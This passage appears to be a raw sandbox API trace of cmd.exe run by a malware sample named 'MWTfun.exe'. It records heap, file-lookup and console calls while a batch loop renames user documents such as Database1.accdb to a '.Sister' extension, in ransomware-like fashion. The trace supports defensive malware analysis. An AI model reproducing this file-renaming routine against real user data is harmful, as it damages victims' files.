(HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0304.223] GetProcessHeap () returned 0x21ed8c70000 [0304.223] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d62590 [0304.223] GetProcessHeap () returned 0x21ed8c70000 [0304.223] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62590) returned 0x130 [0304.224] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.224] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.224] GetProcessHeap () returned 0x21ed8c70000 [0304.224] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7c9a0 [0304.224] GetProcessHeap () returned 0x21ed8c70000 [0304.224] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31030 [0304.224] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.224] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.224] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.224] GetLastError () returned 0x2 [0304.224] GetProcessHeap () returned 0x21ed8c70000 [0304.224] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cc96e0 [0304.224] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cc96f0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.224] SetErrorMode (uMode=0x0) returned 0x0 [0304.224] SetErrorMode (uMode=0x1) returned 0x0 [0304.224] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda13ff80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.225] SetErrorMode (uMode=0x0) returned 0x1 [0304.225] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.225] GetProcessHeap () returned 0x21ed8c70000 [0304.225] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31510 [0304.225] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.225] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.225] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.225] GetLastError () returned 0x2 [0304.225] ??_V@YAXPEAX@Z () returned 0x1 [0304.225] malloc (_Size=0xffce) returned 0x21eda13ff80 [0304.225] ??_V@YAXPEAX@Z () returned 0x21eda13ff80 [0304.225] malloc (_Size=0xffce) returned 0x21eda14ff60 [0304.226] ??_V@YAXPEAX@Z () returned 0x21eda14ff60 [0304.226] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.226] GetLastError () returned 0x2 [0304.226] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.226] GetFileType (hFile=0x54) returned 0x2 [0304.226] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.226] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.227] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.227] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.227] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.227] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.227] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.234] longjmp () [0304.234] ??_V@YAXPEAX@Z () returned 0x1 [0304.234] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Database1.accdb", cAlternateFileName="")) returned 1 [0304.234] GetProcessHeap () returned 0x21ed8c70000 [0304.234] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ef10, Size=0xba) returned 0x21ed8c7d290 [0304.234] GetProcessHeap () returned 0x21ed8c70000 [0304.234] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d290) returned 0xba [0304.234] GetProcessHeap () returned 0x21ed8c70000 [0304.234] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0530 [0304.234] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0530, Size=0x30) returned 0x21ed93b0530 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0530) returned 0x30 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0570 [0304.235] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc87d0 [0304.235] ??_V@YAXPEAX@Z () returned 0x1 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0570, Size=0x170) returned 0x21ed93b0570 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0570) returned 0x170 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b06f0 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b06f0, Size=0x290) returned 0x21ed93b06f0 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b06f0) returned 0x290 [0304.235] GetProcessHeap () returned 0x21ed8c70000 [0304.235] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b0990 [0304.236] GetProcessHeap () returned 0x21ed8c70000 [0304.236] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0990, Size=0x30) returned 0x21ed93b0990 [0304.236] GetProcessHeap () returned 0x21ed8c70000 [0304.236] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0990) returned 0x30 [0304.236] GetProcessHeap () returned 0x21ed8c70000 [0304.236] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b09d0 [0304.236] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.236] GetProcessHeap () returned 0x21ed8c70000 [0304.236] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc88d0 [0304.236] ??_V@YAXPEAX@Z () returned 0x1 [0304.236] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.236] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xc, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cee0 [0304.236] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0304.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xc, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0304.237] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0304.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdfda79a3, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdfda79a3, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0xc, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7d0c0 [0304.237] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0304.237] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x4, dwReserved1=0xc, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0x21ed8c7cee0 [0304.237] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0304.238] _wcsnicmp (_String1="DATABA~1.ACC", _String2="Database1.accdb", _MaxCount=0xf) returned 11 [0304.238] malloc (_Size=0x1ff9c) returned 0x21eda15ff40 [0304.238] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.240] GetProcessHeap () returned 0x21ed8c70000 [0304.240] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45dd0 [0304.240] ??_V@YAXPEAX@Z () returned 0x1 [0304.240] ??_V@YAXPEAX@Z () returned 0x1 [0304.240] GetProcessHeap () returned 0x21ed8c70000 [0304.240] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b09d0, Size=0x160) returned 0x21ed93b09d0 [0304.240] GetProcessHeap () returned 0x21ed8c70000 [0304.241] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b09d0) returned 0x160 [0304.241] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.241] GetFileType (hFile=0x50) returned 0x2 [0304.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.241] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.241] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.246] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.246] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.246] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.246] GetFileType (hFile=0x50) returned 0x2 [0304.246] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.247] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.247] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.247] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.247] GetFileType (hFile=0x50) returned 0x2 [0304.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.248] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.248] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0540*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93b0540*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.250] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Database1.accdb\" \"Database1.accdb.Sister\" ") returned 44 [0304.250] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.250] GetFileType (hFile=0x50) returned 0x2 [0304.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.250] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.251] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2c) returned 1 [0304.252] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.252] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.252] GetFileType (hFile=0x50) returned 0x2 [0304.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.252] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.253] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.253] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.253] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.253] GetFileType (hFile=0x50) returned 0x2 [0304.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.253] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.254] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.254] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.255] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.255] GetFileType (hFile=0x50) returned 0x2 [0304.255] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.255] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.255] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.255] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.256] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.256] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.256] GetFileType (hFile=0x50) returned 0x2 [0304.256] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.256] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.257] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.257] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.262] GetFileType (hFile=0x50) returned 0x2 [0304.262] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.262] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.265] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b09a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93b09a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.266] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Database1.accdb.Sister\" \"Database1.bat\" ") returned 42 [0304.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.266] GetFileType (hFile=0x50) returned 0x2 [0304.266] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.266] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.266] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2a) returned 1 [0304.267] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.267] GetFileType (hFile=0x50) returned 0x2 [0304.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.267] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.268] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.273] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.275] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.275] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.275] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.275] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.275] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.275] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.275] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.275] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.275] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.275] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.275] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.275] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.275] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.275] ??_V@YAXPEAX@Z () returned 0x1 [0304.275] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc0) returned 0x21ed8d6a550 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a550, Size=0x68) returned 0x21ed8d63e70 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63e70) returned 0x68 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x70) returned 0x21ed8d673b0 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xc0) returned 0x21ed8d6a7c0 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a7c0, Size=0x68) returned 0x21ed8d643b0 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d643b0) returned 0x68 [0304.276] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.276] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.276] GetProcessHeap () returned 0x21ed8c70000 [0304.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d0c0 [0304.277] GetProcessHeap () returned 0x21ed8c70000 [0304.277] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937c840 [0304.277] _wcsicmp (_String1="Database1.accdb", _String2=".") returned 54 [0304.277] _wcsicmp (_String1="Database1.accdb", _String2="..") returned 54 [0304.277] GetFileAttributesW (lpFileName="Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0x20 [0304.283] GetProcessHeap () returned 0x21ed8c70000 [0304.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cd96d0 [0304.284] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cd96e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.284] SetErrorMode (uMode=0x0) returned 0x0 [0304.284] SetErrorMode (uMode=0x1) returned 0x0 [0304.284] GetFullPathNameW (in: lpFileName="Database1.accdb", nBufferLength=0x7fe7, lpBuffer=0x21eda15ff40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFilePart=0xa6cf4fd660*="Database1.accdb") returned 0x29 [0304.284] SetErrorMode (uMode=0x0) returned 0x1 [0304.284] GetProcessHeap () returned 0x21ed8c70000 [0304.284] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937cd20 [0304.284] _wcsicmp (_String1="Database1.accdb", _String2=".") returned 54 [0304.284] _wcsicmp (_String1="Database1.accdb", _String2="..") returned 54 [0304.284] GetFileAttributesW (lpFileName="Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0x20 [0304.285] ??_V@YAXPEAX@Z () returned 0x1 [0304.285] malloc (_Size=0xffce) returned 0x21eda15ff40 [0304.285] ??_V@YAXPEAX@Z () returned 0x21eda15ff40 [0304.285] malloc (_Size=0xffce) returned 0x21eda16ff20 [0304.285] ??_V@YAXPEAX@Z () returned 0x21eda16ff20 [0304.285] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0x20 [0304.285] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.285] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.286] FindFirstFileExW (in: 